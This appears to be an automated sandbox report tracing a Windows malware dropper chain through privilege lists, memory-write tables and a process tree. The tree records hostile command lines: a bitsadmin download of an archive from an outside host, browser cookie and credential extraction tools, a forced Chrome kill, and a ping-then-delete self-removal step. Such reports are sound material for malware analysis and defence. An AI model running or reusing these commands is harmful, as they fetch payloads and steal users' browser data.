Cyshupaelaenu.exemsiexec.exeinstaller.exe

description	pid	process
Token: SeDebugPrivilege	1104	Cyshupaelaenu.exe
Token: SeRestorePrivilege	8484	msiexec.exe
Token: SeTakeOwnershipPrivilege	8484	msiexec.exe
Token: SeSecurityPrivilege	8484	msiexec.exe
Token: SeCreateTokenPrivilege	7628	installer.exe
Token: SeAssignPrimaryTokenPrivilege	7628	installer.exe
Token: SeLockMemoryPrivilege	7628	installer.exe
Token: SeIncreaseQuotaPrivilege	7628	installer.exe
Token: SeMachineAccountPrivilege	7628	installer.exe
Token: SeTcbPrivilege	7628	installer.exe
Token: SeSecurityPrivilege	7628	installer.exe
Token: SeTakeOwnershipPrivilege	7628	installer.exe
Token: SeLoadDriverPrivilege	7628	installer.exe
Token: SeSystemProfilePrivilege	7628	installer.exe
Token: SeSystemtimePrivilege	7628	installer.exe
Token: SeProfSingleProcessPrivilege	7628	installer.exe
Token: SeIncBasePriorityPrivilege	7628	installer.exe
Token: SeCreatePagefilePrivilege	7628	installer.exe
Token: SeCreatePermanentPrivilege	7628	installer.exe
Token: SeBackupPrivilege	7628	installer.exe
Token: SeRestorePrivilege	7628	installer.exe
Token: SeShutdownPrivilege	7628	installer.exe
Token: SeDebugPrivilege	7628	installer.exe
Token: SeAuditPrivilege	7628	installer.exe
Token: SeSystemEnvironmentPrivilege	7628	installer.exe
Token: SeChangeNotifyPrivilege	7628	installer.exe
Token: SeRemoteShutdownPrivilege	7628	installer.exe
Token: SeUndockPrivilege	7628	installer.exe
Token: SeSyncAgentPrivilege	7628	installer.exe
Token: SeEnableDelegationPrivilege	7628	installer.exe
Token: SeManageVolumePrivilege	7628	installer.exe
Token: SeImpersonatePrivilege	7628	installer.exe
Token: SeCreateGlobalPrivilege	7628	installer.exe
Token: SeCreateTokenPrivilege	7628	installer.exe
Token: SeAssignPrimaryTokenPrivilege	7628	installer.exe
Token: SeLockMemoryPrivilege	7628	installer.exe
Token: SeIncreaseQuotaPrivilege	7628	installer.exe
Token: SeMachineAccountPrivilege	7628	installer.exe
Token: SeTcbPrivilege	7628	installer.exe
Token: SeSecurityPrivilege	7628	installer.exe
Token: SeTakeOwnershipPrivilege	7628	installer.exe
Token: SeLoadDriverPrivilege	7628	installer.exe
Token: SeSystemProfilePrivilege	7628	installer.exe
Token: SeSystemtimePrivilege	7628	installer.exe
Token: SeProfSingleProcessPrivilege	7628	installer.exe
Token: SeIncBasePriorityPrivilege	7628	installer.exe
Token: SeCreatePagefilePrivilege	7628	installer.exe
Token: SeCreatePermanentPrivilege	7628	installer.exe
Token: SeBackupPrivilege	7628	installer.exe
Token: SeRestorePrivilege	7628	installer.exe
Token: SeShutdownPrivilege	7628	installer.exe
Token: SeDebugPrivilege	7628	installer.exe
Token: SeAuditPrivilege	7628	installer.exe
Token: SeSystemEnvironmentPrivilege	7628	installer.exe
Token: SeChangeNotifyPrivilege	7628	installer.exe
Token: SeRemoteShutdownPrivilege	7628	installer.exe
Token: SeUndockPrivilege	7628	installer.exe
Token: SeSyncAgentPrivilege	7628	installer.exe
Token: SeEnableDelegationPrivilege	7628	installer.exe
Token: SeManageVolumePrivilege	7628	installer.exe
Token: SeImpersonatePrivilege	7628	installer.exe
Token: SeCreateGlobalPrivilege	7628	installer.exe
Token: SeCreateTokenPrivilege	7628	installer.exe
Token: SeAssignPrimaryTokenPrivilege	7628	installer.exe

Suspicious use of FindShellTrayWindow 9 IoCs

Processes:

ultramediaburner.tmpiexplore.exeinstaller.exe

pid process

1000 ultramediaburner.tmp
1456 iexplore.exe
7628 installer.exe
1264
1264
1264
1264
1264
1264
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

pid process

1264
Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

iexplore.exeIEXPLORE.EXE4309.exe4BFF.exe

pid process

1456 iexplore.exe
1456 iexplore.exe
660 IEXPLORE.EXE
660 IEXPLORE.EXE
660 IEXPLORE.EXE
660 IEXPLORE.EXE
10028 4309.exe
10064 4BFF.exe

pid	process
1264

pid	process
1456	iexplore.exe
1456	iexplore.exe
660	IEXPLORE.EXE
660	IEXPLORE.EXE
660	IEXPLORE.EXE
660	IEXPLORE.EXE
10028	4309.exe
10064	4BFF.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Install2.exeInstall2.tmpUltra.exeultramediaburner.exeultramediaburner.tmpKixeshufadae.exeiexplore.exeCyshupaelaenu.execmd.execmd.execmd.exe

description	pid	process	target process
PID 308 wrote to memory of 1984	308	Install2.exe	Install2.tmp
PID 308 wrote to memory of 1984	308	Install2.exe	Install2.tmp
PID 308 wrote to memory of 1984	308	Install2.exe	Install2.tmp
PID 308 wrote to memory of 1984	308	Install2.exe	Install2.tmp
PID 308 wrote to memory of 1984	308	Install2.exe	Install2.tmp
PID 308 wrote to memory of 1984	308	Install2.exe	Install2.tmp
PID 308 wrote to memory of 1984	308	Install2.exe	Install2.tmp
PID 1984 wrote to memory of 368	1984	Install2.tmp	Ultra.exe
PID 1984 wrote to memory of 368	1984	Install2.tmp	Ultra.exe
PID 1984 wrote to memory of 368	1984	Install2.tmp	Ultra.exe
PID 1984 wrote to memory of 368	1984	Install2.tmp	Ultra.exe
PID 368 wrote to memory of 880	368	Ultra.exe	ultramediaburner.exe
PID 368 wrote to memory of 880	368	Ultra.exe	ultramediaburner.exe
PID 368 wrote to memory of 880	368	Ultra.exe	ultramediaburner.exe
PID 368 wrote to memory of 880	368	Ultra.exe	ultramediaburner.exe
PID 368 wrote to memory of 880	368	Ultra.exe	ultramediaburner.exe
PID 368 wrote to memory of 880	368	Ultra.exe	ultramediaburner.exe
PID 368 wrote to memory of 880	368	Ultra.exe	ultramediaburner.exe
PID 880 wrote to memory of 1000	880	ultramediaburner.exe	ultramediaburner.tmp
PID 880 wrote to memory of 1000	880	ultramediaburner.exe	ultramediaburner.tmp
PID 880 wrote to memory of 1000	880	ultramediaburner.exe	ultramediaburner.tmp
PID 880 wrote to memory of 1000	880	ultramediaburner.exe	ultramediaburner.tmp
PID 880 wrote to memory of 1000	880	ultramediaburner.exe	ultramediaburner.tmp
PID 880 wrote to memory of 1000	880	ultramediaburner.exe	ultramediaburner.tmp
PID 880 wrote to memory of 1000	880	ultramediaburner.exe	ultramediaburner.tmp
PID 1000 wrote to memory of 1928	1000	ultramediaburner.tmp	UltraMediaBurner.exe
PID 1000 wrote to memory of 1928	1000	ultramediaburner.tmp	UltraMediaBurner.exe
PID 1000 wrote to memory of 1928	1000	ultramediaburner.tmp	UltraMediaBurner.exe
PID 1000 wrote to memory of 1928	1000	ultramediaburner.tmp	UltraMediaBurner.exe
PID 368 wrote to memory of 868	368	Ultra.exe	Kixeshufadae.exe
PID 368 wrote to memory of 868	368	Ultra.exe	Kixeshufadae.exe
PID 368 wrote to memory of 868	368	Ultra.exe	Kixeshufadae.exe
PID 368 wrote to memory of 1104	368	Ultra.exe	Cyshupaelaenu.exe
PID 368 wrote to memory of 1104	368	Ultra.exe	Cyshupaelaenu.exe
PID 368 wrote to memory of 1104	368	Ultra.exe	Cyshupaelaenu.exe
PID 868 wrote to memory of 1456	868	Kixeshufadae.exe	iexplore.exe
PID 868 wrote to memory of 1456	868	Kixeshufadae.exe	iexplore.exe
PID 868 wrote to memory of 1456	868	Kixeshufadae.exe	iexplore.exe
PID 1456 wrote to memory of 660	1456	iexplore.exe	IEXPLORE.EXE
PID 1456 wrote to memory of 660	1456	iexplore.exe	IEXPLORE.EXE
PID 1456 wrote to memory of 660	1456	iexplore.exe	IEXPLORE.EXE
PID 1456 wrote to memory of 660	1456	iexplore.exe	IEXPLORE.EXE
PID 1104 wrote to memory of 8364	1104	Cyshupaelaenu.exe	cmd.exe
PID 1104 wrote to memory of 8364	1104	Cyshupaelaenu.exe	cmd.exe
PID 1104 wrote to memory of 8364	1104	Cyshupaelaenu.exe	cmd.exe
PID 8364 wrote to memory of 8532	8364	cmd.exe	001.exe
PID 8364 wrote to memory of 8532	8364	cmd.exe	001.exe
PID 8364 wrote to memory of 8532	8364	cmd.exe	001.exe
PID 8364 wrote to memory of 8532	8364	cmd.exe	001.exe
PID 1104 wrote to memory of 7556	1104	Cyshupaelaenu.exe	cmd.exe
PID 1104 wrote to memory of 7556	1104	Cyshupaelaenu.exe	cmd.exe
PID 1104 wrote to memory of 7556	1104	Cyshupaelaenu.exe	cmd.exe
PID 7556 wrote to memory of 7628	7556	cmd.exe	installer.exe
PID 7556 wrote to memory of 7628	7556	cmd.exe	installer.exe
PID 7556 wrote to memory of 7628	7556	cmd.exe	installer.exe
PID 7556 wrote to memory of 7628	7556	cmd.exe	installer.exe
PID 7556 wrote to memory of 7628	7556	cmd.exe	installer.exe
PID 7556 wrote to memory of 7628	7556	cmd.exe	installer.exe
PID 7556 wrote to memory of 7628	7556	cmd.exe	installer.exe
PID 1104 wrote to memory of 7724	1104	Cyshupaelaenu.exe	cmd.exe
PID 1104 wrote to memory of 7724	1104	Cyshupaelaenu.exe	cmd.exe
PID 1104 wrote to memory of 7724	1104	Cyshupaelaenu.exe	cmd.exe
PID 7724 wrote to memory of 5664	7724	cmd.exe	gpooe.exe
PID 7724 wrote to memory of 5664	7724	cmd.exe	gpooe.exe

C:\Users\Admin\AppData\Local\Temp\Install2.exe
"C:\Users\Admin\AppData\Local\Temp\Install2.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:308

C:\Users\Admin\AppData\Local\Temp\is-HACEN.tmp\Install2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HACEN.tmp\Install2.tmp" /SL5="$2015A,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install2.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1984

C:\Users\Admin\AppData\Local\Temp\is-UI9Q3.tmp\Ultra.exe
"C:\Users\Admin\AppData\Local\Temp\is-UI9Q3.tmp\Ultra.exe" /S /UID=burnerch1
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:368

C:\Program Files\Google\INRGESTXYG\ultramediaburner.exe
"C:\Program Files\Google\INRGESTXYG\ultramediaburner.exe" /VERYSILENT
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:880

C:\Users\Admin\AppData\Local\Temp\is-5GADD.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5GADD.tmp\ultramediaburner.tmp" /SL5="$80128,281924,62464,C:\Program Files\Google\INRGESTXYG\ultramediaburner.exe" /VERYSILENT
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1000

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
6⤵
- Executes dropped EXE
PID:1928

C:\Users\Admin\AppData\Local\Temp\f6-a45da-987-7b4b7-e3d0646926e4d\Kixeshufadae.exe
"C:\Users\Admin\AppData\Local\Temp\f6-a45da-987-7b4b7-e3d0646926e4d\Kixeshufadae.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:868

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
5⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1456

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1456 CREDAT:275457 /prefetch:2
6⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:660

C:\Users\Admin\AppData\Local\Temp\1b-a55b2-da8-2c2ba-229ccf8456bf6\Cyshupaelaenu.exe
"C:\Users\Admin\AppData\Local\Temp\1b-a55b2-da8-2c2ba-229ccf8456bf6\Cyshupaelaenu.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ysypdacp.qtj\001.exe & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:8364

C:\Users\Admin\AppData\Local\Temp\ysypdacp.qtj\001.exe
C:\Users\Admin\AppData\Local\Temp\ysypdacp.qtj\001.exe
6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:8532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wovazexn.ym3\installer.exe /qn CAMPAIGN="654" & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:7556

C:\Users\Admin\AppData\Local\Temp\wovazexn.ym3\installer.exe
C:\Users\Admin\AppData\Local\Temp\wovazexn.ym3\installer.exe /qn CAMPAIGN="654"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:7628

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\wovazexn.ym3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\wovazexn.ym3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619879507 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
7⤵
PID:9028

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h1vsuqz1.yts\gpooe.exe & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:7724

C:\Users\Admin\AppData\Local\Temp\h1vsuqz1.yts\gpooe.exe
C:\Users\Admin\AppData\Local\Temp\h1vsuqz1.yts\gpooe.exe
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:5664

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
- Executes dropped EXE
PID:8260

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
- Executes dropped EXE
PID:8760

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aptfc42s.p2q\askinstall39.exe & exit
5⤵
PID:9796

C:\Users\Admin\AppData\Local\Temp\aptfc42s.p2q\askinstall39.exe
C:\Users\Admin\AppData\Local\Temp\aptfc42s.p2q\askinstall39.exe
6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:9844

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:2512

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
PID:4016

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d0ybarfv.xyc\setup.exe & exit
5⤵
PID:10032

C:\Users\Admin\AppData\Local\Temp\d0ybarfv.xyc\setup.exe
C:\Users\Admin\AppData\Local\Temp\d0ybarfv.xyc\setup.exe
6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:10068

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\d0ybarfv.xyc\setup.exe"
7⤵
PID:9712

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
8⤵
- Runs ping.exe
PID:9688

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fttjzhoe.yat\request2.exe & exit
5⤵
PID:3708

C:\Users\Admin\AppData\Local\Temp\fttjzhoe.yat\request2.exe
C:\Users\Admin\AppData\Local\Temp\fttjzhoe.yat\request2.exe
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3736

C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3812

C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
parse.exe -f json -b firefox
8⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5064

C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
parse.exe -f json -b chrome
8⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5080

C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
parse.exe -f json -b edge
8⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g3h5d3kg.vlb\SunLabsPlayer.exe /S & exit
5⤵
PID:3832

C:\Users\Admin\AppData\Local\Temp\g3h5d3kg.vlb\SunLabsPlayer.exe
C:\Users\Admin\AppData\Local\Temp\g3h5d3kg.vlb\SunLabsPlayer.exe /S
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3880

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
- Drops file in Program Files directory
PID:7816

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
PID:7712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
PID:4884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
PID:3412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
PID:9348

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
PID:9588

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
- Checks for any installed AV software in registry
- Drops file in Program Files directory
PID:9908

C:\Windows\SysWOW64\bitsadmin.exe
"bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
7⤵
- Download via BitsAdmin
PID:10192

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfGNXVQDAS5gsjBB -y x C:\zip.7z -o"C:\Program Files\temp_files\"
7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:8780

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pqoEjL4JJuJeAe4u -y x C:\zip.7z -o"C:\Program Files\temp_files\"
7⤵
- Executes dropped EXE
PID:3440

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
PID:3408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
- Drops file in Program Files directory
PID:3480

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
- Drops file in Program Files directory
PID:8524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
PID:3472

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
PID:3508

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll" ogdtzM
7⤵
PID:9292

C:\Windows\system32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll" ogdtzM
8⤵
- Drops file in System32 directory
PID:9328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
- Drops file in Program Files directory
PID:9456

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
- Drops file in Program Files directory
PID:9576

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
- Drops file in Program Files directory
PID:9564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
PID:9684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5295.tmp\tempfile.ps1"
7⤵
PID:9612

C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
7⤵
- Executes dropped EXE
PID:9984

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pznibfyo.ahy\005.exe & exit
5⤵
PID:3896

C:\Users\Admin\AppData\Local\Temp\pznibfyo.ahy\005.exe
C:\Users\Admin\AppData\Local\Temp\pznibfyo.ahy\005.exe
6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\13d0o4zk.dmb\ifhwwyy.exe & exit
5⤵
PID:2584

C:\Users\Admin\AppData\Local\Temp\13d0o4zk.dmb\ifhwwyy.exe
C:\Users\Admin\AppData\Local\Temp\13d0o4zk.dmb\ifhwwyy.exe
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4064

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
- Executes dropped EXE
PID:2908

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
- Executes dropped EXE
PID:8048

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xcpnwmnc.vaa\toolspab1.exe & exit
5⤵
PID:3996

C:\Users\Admin\AppData\Local\Temp\xcpnwmnc.vaa\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\xcpnwmnc.vaa\toolspab1.exe
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1164

C:\Users\Admin\AppData\Local\Temp\xcpnwmnc.vaa\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\xcpnwmnc.vaa\toolspab1.exe
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7824

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0iqxvroh.cdd\GcleanerWW.exe /mixone & exit
5⤵
PID:9172

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tbultw05.ru4\42a25820.exe & exit
5⤵
PID:9208

C:\Users\Admin\AppData\Local\Temp\tbultw05.ru4\42a25820.exe
C:\Users\Admin\AppData\Local\Temp\tbultw05.ru4\42a25820.exe
6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
PID:7908

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:8484

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding D0A4A5C1AAC15C86B19FC0420346F5BB C
2⤵
- Loads dropped DLL
PID:8708

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2EDE9943DFDF7130DD1896C699E94EAD
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:7808

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
3⤵
- Kills process with taskkill
PID:7924

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 89158A50B7D4A905173C6EC7C2D720C6 M Global\MSI0000
2⤵
- Loads dropped DLL
PID:4944

C:\Windows\system32\taskeng.exe
taskeng.exe {ED977E02-D632-4CF8-9CFD-4B3D729D7668} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:4056

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
2⤵
- Executes dropped EXE
PID:2476

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
2⤵
- Executes dropped EXE
PID:2504

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
2⤵
- Executes dropped EXE
PID:2540

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
2⤵
- Executes dropped EXE
PID:2576

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
2⤵
- Executes dropped EXE
PID:2880

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
2⤵
- Executes dropped EXE
PID:2324

C:\Users\Admin\AppData\Local\Temp\4309.exe
C:\Users\Admin\AppData\Local\Temp\4309.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:10028

C:\Users\Admin\AppData\Local\Temp\4BFF.exe
C:\Users\Admin\AppData\Local\Temp\4BFF.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:10064

